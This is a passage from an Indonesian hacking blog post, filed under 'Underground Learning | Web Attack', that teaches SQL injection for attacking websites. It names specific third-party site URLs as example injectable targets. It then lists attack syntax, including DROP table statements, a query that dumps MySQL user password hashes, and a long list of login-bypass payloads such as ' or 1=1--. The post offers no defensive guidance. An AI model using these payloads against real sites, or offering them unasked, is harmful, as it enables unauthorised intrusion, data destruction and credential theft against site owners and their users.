| Filename | Paham SQL Injection dan Syntax nya |
| Permission | rw-r--r-- |
| Author | Indrazz Afterlife |
| Date and Time | 1:12 PM |
| Label | Underground Learning| Web Attack |
| Action |
SQL Injection sudah pernah saya bahas disini, nah sekarang saya perluas pada artikel ini seiring berkembangnya pengetahuan saya mengenai teknik hacking yang satu ini.
SQL Injection atau dalam bahasa indonesia Injeksi SQL, memang merupakan teknik hacking yang sampai saat ini masih banyak digunakan para attacker (penyerang suatu website).
mengapa? karena pada sebuah website yang memiliki database, pastilah disana terdapat perintah-perintah SQL.
Injeksi SQL Banyak dilakukan terhadap URL yang berjenis seperti ini...
- www.arche-noah.at/etomite/index.php?id=249
- www.florentijnhofman.nl/dev/project.php?id=154
- www.gamershood.com/game.php?id=1309
dan masih banyak lagi contoh lainnya. lalu bagaimana kita mendeteksi bahwa web tersebut dapat kita serang menggunakan metode injeksi sql ?
lihat struktur websitenya!
PERTAMA: Lihat pada bagian URL
jika URL mengandung parameter = atau id= maka dapat dipastikan web tersebut memiliki database yang menggunakan pemrograman SQL. (*periksa pada semua url yang ada pada website)
contoh:
KEDUA: Lihat pada bagian halaman
jika ada halaman website yang memiliki form untuk menginput data, maka web tersebut bisa dipastikan menggunakan pemrograman database SQL. (*cek pada setiap halaman/page yang ada pada website)
pada ketiga gambar diatas kita tau bahwa pada web-web itu terdapat media (jalan) bagi para attacker untuk memasukkan syntax syntax berbahaya yang bisa saja langsung mendapatkan akses ke dalam server (database).
Pada teknik penetration testing (teknik pembobolan/penembusan) suatu website, seorang elite hacker tidak selalu menginputkan tanda ' atau -- pada url / form untuk menguji terdapat error atau tidak.
terkadang pesan error tidak akan ditampilkan, maka dari itu seorang elite hacker (bukan saya) akan mencari celah dengan cara mengira-ngira syntax apa yang akan dimasukan untuk kasus yang demikian. semoga ente mengerti bahasa ane.
bergerak pada contoh:
pada kasus yang umum sekali, injeksi SQL pada url bisa ente pelajari disini tempat saya menimba ilmu.
disana dijelaskan lengkap step by step sql injection pada url.
Beberapa Syntax yang sering digunakan untuk serangan SQL Injection:
SELECT * FROM Users WHERE Username='$username' AND Password='$password'
SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password')))
SELECT title, text from news where id=$id
DROP tablename;--
DROP tablename;#
SELECT @@version
SELECT host, user, password FROM mysql.user; — priv
**masih banyak syntax lainnya.
Beberapa Syntax yang sering digunakan untuk melewati halaman login (login bypass)
admin'--
= 'or' 1=1
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
**masih banyak lagi syntax yang bersangkutan. selebihnya googling ya omm... ilmu tersebar luas disana :D
nah, dibawah ini adalah referensi saya dalam mempelajari sql injection. meskipun pada kenyataannya saya sering mengalami kegagalan dalam penetration testing, wkwkwkw ^_^
namun tak apalah, belajar adalah proses tanpa akhir. Jangan menyerah :D
Referensi 1
Referensi 2
Referensi 3
Referensi 4
HN-Community dan Indonesian Fighter Cyber adalah tempat saya belajar dan menimba ilmu. Jangan lupa bergabung disana. Kalian akan dipandu oleh pro moderator, i love indonesia . Jayalah INDONESIAKU!
1 comments:
artikel yang bermanfaat mas.. ijin mempelajari
Post a Comment
Kepada Pembaca:
Artikel pada blog ini DILINDUNGI DMCA. Segala bentuk copy paste tanpa mencantumkan link [afterlifecode.blogspot.com] akan berujung pada penghapusan akun blog anda.
Jika anda memiliki kesulitan atau kata-kata sukar pada artikel, silahkan tinggalkan komentar atau bergabung di grup facebook untuk berdiskusi bersama.